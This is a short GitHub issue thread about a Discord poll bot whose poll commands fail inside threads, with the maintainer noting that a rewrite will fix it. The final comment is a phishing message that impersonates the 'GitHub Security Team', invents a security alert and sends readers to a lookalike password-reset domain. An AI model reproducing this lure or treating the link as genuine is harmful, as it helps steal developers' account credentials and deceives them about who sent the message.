### ISSUE TITLE
PollBot does not work in threads

### ISSUE THREAD

**Issue by remyjette** [remyjette/DiscordPollBot#9]
Discord recently released the Threads feature: https://support.discord.com/hc/en-us/articles/4403205878423-Threads-FAQ

However, if you try to `/startpoll` or `!startpoll` inside a thread, the poll creation fails (`/startpoll` shows "This interaction failed" and `!startpoll` simply does nothing)

**Comment by remyjette** [comment]
This will be fixed in the rewrite to use discord.py 2.0

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
